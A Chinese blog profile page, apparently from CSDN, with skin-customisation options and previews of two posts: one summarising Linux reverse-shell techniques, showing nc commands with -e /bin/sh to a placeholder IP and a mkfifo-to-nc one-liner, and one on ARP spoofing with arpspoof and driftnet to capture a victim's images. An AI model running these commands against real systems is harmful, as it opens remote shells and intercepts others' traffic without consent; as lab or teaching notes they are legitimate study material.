自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(2)
  • 收藏
  • 关注

原创 Linux反弹Shell总结

反弹姿势1、NC正向反弹靶机:nc -lvvp 靶机端口 -e /bin/sh攻击机:nc 靶机ip 靶机端口2、NC反向反弹(1)、可使用-e参数:靶机:nc x.x.x.x 8888 -e /bin/bash 攻击机:nc -lvvp 8888(2)、NC,无-e参数反弹shell有些版本的NC可能不支持-e选项,不能使用-e,则:方法一:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc

2022-01-06 23:34:05 4326 1

原创 ARP欺骗攻击抓取图片

ARP欺骗攻击抓取图片一、实验原理1.ifconfig查找自己的ip地址2.nmap -sP ip地址/243.arpspoof -i eth0 -t 对方ip 网关地址4.启转发数据(echo 1 > /proc/sys/net/ipv4/ip_forward)5.driftnet 抓取图片6.ARP协议是用来已知IP地址求MAC地址。在每台主机中都有一张ARP地址缓存表,当...

2019-09-06 20:39:59 1638

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除